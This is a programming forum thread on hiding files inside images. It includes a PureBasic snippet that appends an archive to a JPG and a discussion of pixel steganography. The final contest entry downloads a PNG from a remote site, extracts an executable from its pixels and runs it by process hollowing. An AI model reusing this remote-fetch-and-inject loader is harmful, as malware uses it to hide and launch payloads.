No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.c4s wrote:The data is just added beyond the "end of jpg image" marker?
No, any executable appended to a JPG like this can't be executed.TerryHough wrote:Probably explains your "drive by malware install" problem.
Yes, but it technically results in what I've said.MachineCode wrote:No, it just appends one file to the end of the other. Not after any marker. It's an old trick that's been around for years. There's like a million YouTube videos showing how to do it.c4s wrote:The data is just added beyond the "end of jpg image" marker?
This is not true. There have been several examples where code attached to PDF and JPG files, just to take some examples, would be executed due to flaws in the software which processes these files (e.g. http://www.microsoft.com/technet/securi ... 4-028.mspx to take one example).MachineCode wrote: No, any executable appended to a JPG like this can't be executed.
Code: Select all
; Executes the PB compiler with the /? option and displays the output (windows version)
; For Linux/MacOS change the "/?" to "-h" and the "\" to "/" in the compiler path.
;
Procedure Registry_INTERNAL_SetError(errorCode)
Protected *Buffer, len
len = FormatMessage_(#FORMAT_MESSAGE_ALLOCATE_BUFFER|#FORMAT_MESSAGE_FROM_SYSTEM, 0, errorCode, 0, @*Buffer, 0, 0)
If len
gRegistry_LastErrorDescription$ = PeekS(*Buffer, len)
LocalFree_(*Buffer)
Else
gRegistry_LastErrorDescription$ = "Errorcode: " + Hex(errorCode)
EndIf
gRegistry_LastErrorCode = errorCode
EndProcedure
Procedure.s Registry_GetValueAsString(hKey, subKey$, valueName$, *type.INTEGER = 0)
Protected errorCode = #ERROR_SUCCESS, result$, hKey1, bufferSize, type, value.q
errorCode = RegOpenKeyEx_(hKey, subKey$, 0, #KEY_READ, @hKey1)
If errorCode = #ERROR_SUCCESS
If hKey1
errorCode = RegQueryValueEx_(hKey1, valueName$, 0, @type, 0, @bufferSize)
If errorCode = #ERROR_SUCCESS
If *type
*type\i = type
EndIf
Select type
Case #REG_DWORD, #REG_QWORD
errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, @value, @bufferSize)
If errorCode = #ERROR_SUCCESS
result$ = Str(value)
EndIf
Case #REG_SZ, #REG_EXPAND_SZ
If bufferSize
value = AllocateMemory(buffersize)
If value
errorCode = RegQueryValueEx_(hKey1, valueName$, 0, 0, value, @bufferSize)
If errorCode = #ERROR_SUCCESS
result$ = PeekS(value)
EndIf
FreeMemory(value)
Else
errorCode = #ERROR_NOT_ENOUGH_MEMORY
EndIf
EndIf
EndSelect
EndIf
RegCloseKey_(hKey1)
EndIf
EndIf
Registry_INTERNAL_SetError(errorCode)
ProcedureReturn result$
EndProcedure
imagetohide$="for7z.jpg";this is what i want to hide in secretimage.jpg
fakeimage$="1.jpg";this is what you will see opening normal the jpeg
secretimage$="secretimage.jpg";open 7z then navigate to your path and open it , here you find what you hide
Path7z$= Registry_GetValueAsString(#HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\7zFM.exe" , "Path", *type.INTEGER = 0)
Debug Path7z$
RunProgram(Path7z$+"\7z.exe","a 1.7z "+imagetohide$,"")
Delay(500);'waiting' to 7z to finish replace it with a repeat until not running
Compiler = RunProgram("c:\windows\system32\cmd.exe", "/ccopy /b "+fakeimage$+" + 1.7z "+secretimage$, "", #PB_Program_Open|#PB_Program_Read)
Output$ = ""
If Compiler
While ProgramRunning(Compiler)
Output$ + ReadProgramString(Compiler) + Chr(13)
Wend
Output$ + Chr(13) + Chr(13)
Output$ + "Exitcode: " + Str(ProgramExitCode(Compiler))
EndIf
MessageRequester("Output", Output$)
Interesting idea, I'm going to have a play with that when I get some time. Thanks for the tip!On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.
Now why didn't I think about that with this purepunch!Thorium wrote:Thats not realy good hidden. There are better ways to hide stuff in images. On lossless formats you can set or delete every last bit of the pixel. So you can store 8 bits = 1 character in 8 pixel. Or change the bit of every color channel, then you can store 3 bits per pixel.
Of course the image colors will be slightly different. But since we only use the lowest bit no one will notice the difference.
Thats way better hidden. Not even the images file size is changing. ^^
Code: Select all
;*****************************************************************************
;*
;* PurePunch Contest #4
;*
;* Name : Nova
;* Author : idle
;* Category : PurePunch Crunch | tricky bastard
;* Date : 16/9/2009
;* Notes : READ THE NOTES BEFORE RUNNING
;* : Windows only may not run on x64
;* : Make sure you have saved your work before running
;* : Will download image automatically, may take some time!
;* : Set your recording source to wave out mix and play your favourate song!
;* : run program, click splash screen to continue, right click for controls, esc to end
;* : If you haven't set your recording to wave out mix and only see a black screen
;* : right click the screen and choose the "normal option"
;* : For full instructions on Nova controls Goto http://www.idlearts.com/nova.html
;*****************************************************************************
Macro wp(a,b,c,d,e):WriteProcessMemory_(a,b,c,d,e):EndMacro:Structure K:SN.b[8]
StructureUnion:Pha.l:Vs.l:EndStructureUnion:Va.l:Sr.l:pRd.l:ptrl.l:pln.l:nr.w
nol.w:Cs.l:EndStructure:Structure V:V.K[95]:EndStructure:Structure pinf
hP.i:hT.i:pId:i:TId.i:EndStructure:Procedure R(f,n.s):*idh.IMAGE_DOS_HEADER=f
*s.V:pi.PINF:*n.IMAGE_NT_HEADERS:si.STARTUPINFO:lBA.l:Ctx.CONTEXT:Addr.l
r.l:i.l:CreateProcess_(0,n,0,0,0,4,0,0,@si,@pi):Ctx\ContextFlags=65538
If GetThreadContext_(pi\hT,Ctx):ReadProcessMemory_(pi\hP,Ctx\Ebx+8,@Addr,4,0)
If Not ZwUnmapViewOfSection_(Pi\hP,Addr):*n=f+*idh\e_lfanew:ts=PeekL(*n+52)
tt=PeekL(*n+80):ty=PeekL(*n+84):tz=*n\OptionalHeader:tq=PeekW(*n+6)-1
lBA=VirtualAllocEx_(pi\hP,ts,tt,12288,64):WP(pi\hP,lBA,f,ty,@r):tf=PeekW(*n+20)
*s=tz+tf:For i=0 To tq:WP(pi\hP,lBA+*s\V[i]\Va,f+*s\V[i]\pRd,*s\V[i]\Sr,@r)
Next:WP(pi\hP,Ctx\Ebx+8,@lBA,4,0):te=PeekL(*n+40):Ctx\Eax=lBA+te
SetThreadContext_(pi\hT,Ctx):ResumeThread_(pi\hT):End:EndIf:EndIf:End
EndProcedure:Global *o,q,w=512,h=460,fi.s="http://www.idlearts.com/sn5.png"
If FileSize("sn5.png")=-1:InitNetwork():ReceiveHTTPFile(fi,"sn5.png"):EndIf
UsePNGImageDecoder():LoadImage(2,"sn5.png"):OpenWindow(0,0,0,w,h,"",2147483649)
ImageGadget(1,0,0,w,h,ImageID(2)):*o=AllocateMemory(75264)
StartDrawing(ImageOutput(2)):While a<75264:tb=Point(b%512,(b/512))>>16 &$FF
PokeB(*o+a,tb):a+1:b+4:Wend:StopDrawing():Repeat:WaitWindowEvent()
ea=EventGadget():If ea=1:q=1:EndIf:Until q:If q=1:r(*o,ProgramFilename()):EndIf
